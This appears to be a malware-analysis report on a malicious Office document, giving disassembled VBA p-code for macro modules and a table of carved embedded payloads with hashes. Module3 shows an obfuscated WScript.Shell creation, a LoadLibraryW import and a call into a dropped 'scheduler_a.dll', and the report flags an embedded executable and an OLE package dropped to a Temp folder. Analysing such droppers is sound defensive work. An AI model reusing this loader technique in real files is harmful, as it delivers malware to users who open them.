' Macros/VBA/Module2 - 3842 bytes
' Line #0:
' Dim (Public)
' VarDefn CursorPosition
' Line #1:
' Line #2:
' FuncDefn (Public Function SetResourceBytes(lpType As Long) As Long)
' Line #3:
' Dim
' VarDefn pReturn (As Long)
' VarDefn rPort (As Long)
' VarDefn nCount (As Long)
' Line #4:
' Ld lpData
' FnUBound 0x0000
' LitDI2 0x0001
' Add
' Ld lpData
' FnLBound 0x0000
' Sub
' St nCount
' Line #5:
' Ld lpFile
' LitVarSpecial (False)
' Ld BeginUpdate
' ArgsMemLd Resource 0x0002
' St pReturn
' Line #6:
' Ld pReturn
' LitDI2 0x0000
' Ne
' IfBlock
' Line #7:
' Ld pReturn
' Ld lpType
' Ld lpID
' LitDI2 0x0409
' Ld lpData
' FnLBound 0x0000
' ArgsLd lpData 0x0001
' Ld nCount
' Ld Update
' ArgsMemLd Resource1 0x0006
' St rPort
' Line #8:
' Ld pReturn
' LitVarSpecial (False)
' Ld EndUpdate
' ArgsMemCall Resource 0x0002
' Line #9:
' Ld rPort
' LitDI2 0x0000
' Ne
' If
' BoSImplicit
' LitVarSpecial (True)
' St SetResourceBytes
' EndIf
' Line #10:
' EndIfBlock
' Line #11:
' EndFunc
' Line #12:
' FuncDefn (Sub ConvertChartToPicture())
' Line #13:
' Dim
' VarDefn Cht
' Line #14:
' Ld ActiveChart
' LitNothing
' Is
' If
' BoSImplicit
' ExitSub
' EndIf
' Line #15:
' Ld ActiveSheet
' ArgsLd TypeName 0x0001
' LitStr 0x0005 "Chart"
' Eq
' If
' BoSImplicit
' ExitSub
' EndIf
' Line #16:
' SetStmt
' Ld ActiveChart
' Set Cht
' Line #17:
' LineCont 0x0004 07 00 06 00
' Ld xlPrinter
' ParamNamed Appearance
' Ld xlScreen
' ParamNamed Size
' Ld xlPicture
' ParamNamed Format
' Ld Cht
' ArgsMemCall CopyPicture 0x0003
' Line #18:
' EndSub
' Line #19:
' Line #20:
' Line #21:
' Line #22:
' FuncDefn (Sub CreateUnlinkedChart())
' Line #23:
' Dim
' VarDefn MyChart
' Line #24:
' SetStmt
' Ld ActiveSheet
' MemLd Shapes
' MemLd AddChart2
' MemLd Chart
' Set MyChart
' Line #25:
' StartWithExpr
' Ld MyChart
' With
' Line #26:
' MemLdWith SeriesCollection
' ArgsMemCall NewSeries 0x0000
' Line #27:
' LitStr 0x0005 "Sales"
' LitDI2 0x0001
' ArgsMemLdWith SeriesCollection 0x0001
' MemSt Name
' Line #28:
' LitStr 0x0003 "Jan"
' LitStr 0x0003 "Feb"
' LitStr 0x0003 "Mar"
' ArgsArray Array 0x0003
' LitDI2 0x0001
' ArgsMemLdWith SeriesCollection 0x0001
' MemSt XValues
' Line #29:
' LitDI2 0x007D
' LitDI2 0x00A5
' LitDI2 0x00BD
' ArgsArray Array 0x0003
' LitDI2 0x0001
' ArgsMemLdWith SeriesCollection 0x0001
' MemSt Values
' Line #30:
' Ld xlColumnClustered
' MemStWith ChartType
' Line #31:
' Ld msoElementLegendNone
' ArgsMemCallWith SetElement 0x0001
' Line #32:
' EndWith
' Line #33:
' EndSub
' Line #34:
' Line #35:
' Line #36:
' FuncDefn (Public Sub ReplaceFile(TextBox1Tag))
' Line #37:
' ArgsCall DoEvents 0x0000
' Line #38:
' Line #39:
' LitVarSpecial (False)
' Ld Application
' MemSt DisplayAlerts
' Line #40:
' ArgsCall DoEvents 0x0000
' Line #41:
' Ld Application
' MemLd Version
' ArgsLd Val 0x0001
' LitDI2 0x000E
' Lt
' IfBlock
' Line #42:
' Ld TextBox1Tag
' LitDI2 0x000D
' Ld ActiveDocument
' ArgsMemCall SaveAs 0x0002
' Line #43:
' ElseBlock
' Line #44:
' Ld TextBox1Tag
' LitDI2 0x000D
' Ld ActiveDocument
' ArgsMemCall SaveAs2 0x0002
' Line #45:
' EndIfBlock
' Line #46:
' QuoteRem 0x0008 0x0028 "SaveAs2 TextBox1Tag, FileFormat:=39 + 12"
' Line #47:
' ArgsCall DoEvents 0x0000
' Line #48:
' QuoteRem 0x0004 0x0014 "ActiveDocument.Close"
' Line #49:
' ArgsCall DoEvents 0x0000
' Line #50:
' Line #51:
' EndSub
' Line #52:
' Line #53:
' Line #54:
' Line #55:
' Macros/VBA/Module3 - 6278 bytes
' Line #0:
' LbMark
' Ld Win64
' LbIf
' Line #1:
' LineCont 0x0004 06 00 08 00
' FuncDefn (Public Function ZooDcom() As Integer)
' Line #2:
' FuncDefn (Public Function PORDMN2(ByVal lpLibFileName As String) As Long)
' Line #3:
' LbMark
' LbElse
' Line #4:
' Reparse 0x006E " Public Declare Function PORDMN2 Lib "kernel32" Alias "LoadLibraryW" (ByVal lpLibFileName As String) As Long"
' Line #5:
' LineCont 0x0004 00 00 D9 FF
' Reparse 0x005D " Public Declare Function ZooDcom Lib "scheduler_a.dll" Alias "PORDMN" () As Integer"
' Line #6:
' LbMark
' LbEndIf
' Line #7:
' Line #8:
' FuncDefn (Public Sub AppStart())
' Line #9:
' Line #10:
' Dim
' VarDefn PointerNull (As Object)
' Line #11:
' Dim
' VarDefn SpecialPath (As String)
' Line #12:
' Line #13:
' Line #14:
' SetStmt
' LitStr 0x0005 "WScri"
' LitStr 0x0008 "pt.Shell"
' Add
' ArgsLd CreateObject 0x0001
' Set PointerNull
' Line #15:
' Line #16:
' LitStr 0x0001 "%"
' Ld UserForm2
' MemLd TextBox1
' MemLd Tag
' Add
' LitStr 0x0001 "%"
' Add
' Ld PointerNull
' ArgsMemLd ExpandEnvironmentStrings 0x0001
' Ld UserForm2
' MemLd TextBox1
' MemSt Tag
' Line #17:
' Line #18:
' Line #19:
' Ld UserForm2
' MemLd TextBox2
' MemLd Tag
' Ld PointerNull
' ArgsMemLd SpecialFolders 0x0001
' Ld UserForm2
' MemLd TextBox2
' MemSt Tag
' Line #20:
' Ld UserForm2
' MemLd TextBox1
' MemLd Tag
' Paren
' ArgsCall ChDir 0x0001
' Line #21:
…
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_office_0001dfcf.exe | embedded-pe | Office MZ+PE at offset 0x1DFCF | 615473 bytes | 5c7a598fa1fd9c56c730e1febc715aaeda46170bfcc805b9d3b17649c4c25342 |
Detection
ClamAV: No threats found
Obfuscation or payload: likely. Carved macro source contains an auto-exec entry point and execution/download terms.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| ole10native_00.bin | ole-package | OLE Ole10Native stream: ObjectPool/_1634717887/Ole10Native | 548379 bytes | 8ebd81f3e8ed6aa01b76bfea33d194ed9360281e7bf2a2ea2820ce50d638e53a |
| ole10native_00_basecamp | ole-package-payload | OLE Ole10Native payload: ObjectPool/_1634717887/Ole10Native; display_name=basecamp; full_path=C:\Users\J\AppData\Local\Temp\basecamp; temp_path=; def_file= | 547944 bytes | 7e1ccf2eccc89637a106e8dc36160c0f754e43b02151612828a6a5be7e5ff6bc |